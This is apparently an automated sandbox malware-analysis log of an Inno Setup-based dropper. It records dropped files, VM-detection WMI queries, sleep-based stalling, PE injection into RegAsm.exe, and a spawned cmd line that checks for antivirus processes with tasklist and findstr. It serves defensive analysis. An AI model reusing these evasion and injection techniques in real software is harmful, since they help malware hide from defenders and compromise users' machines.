                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-M0QJK.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpFile created: C:\StrLocalGate\MmReveals.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpFile created: C:\StrLocalGate\is-RISCU.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SR5HU.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpFile created: C:\Program Files (x86)\StrLocalGate\is-RI2MT.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpFile created: C:\Program Files (x86)\StrLocalGate\Setup.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0059577B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,14_2_0059577B
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00525EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,14_2_00525EDA
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_005332E9 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_005332E9
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Found stalling execution ending in API Sleep call
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifStalling execution: Execution stalls by calling Sleepgraph_14-102394
                    Source: C:\StrLocalGate\MmReveals.exeStalling execution: Execution stalls by calling Sleepgraph_3-3897
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeMemory allocated: D30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeMemory allocated: 2720000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeMemory allocated: 2620000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M0QJK.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SR5HU.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_14-102037
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_14-100711
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifAPI coverage: 5.0 %
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 5480Thread sleep count: 40 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe TID: 4960Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe TID: 4548Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_004062D5 FindFirstFileW,FindClose,3_2_004062D5
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_00402E18 FindFirstFileW,3_2_00402E18
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00406C9B
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_005747B7 GetFileAttributesW,FindFirstFileW,FindClose,14_2_005747B7
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00573B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00573B4F
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00573E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00573E72
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0057C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,14_2_0057C16C
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0057CB81 FindFirstFileW,FindClose,14_2_0057CB81
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0057CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,14_2_0057CC0C
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0057F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_0057F445
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0057F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_0057F5A2
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0057F8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,14_2_0057F8A3
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00525D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,14_2_00525D13
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: Eco.pif, 0000000E.00000003.2331706857.0000000001604000.00000004.00000020.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2320733420.0000000001602000.00000004.00000020.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2330323847.0000000001603000.00000004.00000020.00020000.00000000.sdmp, Eco.pif, 0000000E.00000002.2334396849.0000000001604000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2584519297.00000000058D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifAPI call chain: ExitProcess graph end nodegraph_14-100713
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_005843B9 BlockInput,14_2_005843B9
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00525240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,14_2_00525240
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00545BDC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,14_2_00545BDC
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,3_2_004062FC
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_005686B0 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,14_2_005686B0
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0053A284 SetUnhandledExceptionFilter,14_2_0053A284
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0053A2B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0053A2B5
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifMemory written: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe base: 700000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifMemory written: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe base: 700000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifMemory written: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe base: 418000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0056914C LogonUserW,14_2_0056914C
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00525240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,14_2_00525240
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00571932 SendInput,keybd_event,14_2_00571932
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0057504F mouse_event,14_2_0057504F
                    Source: C:\StrLocalGate\MmReveals.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
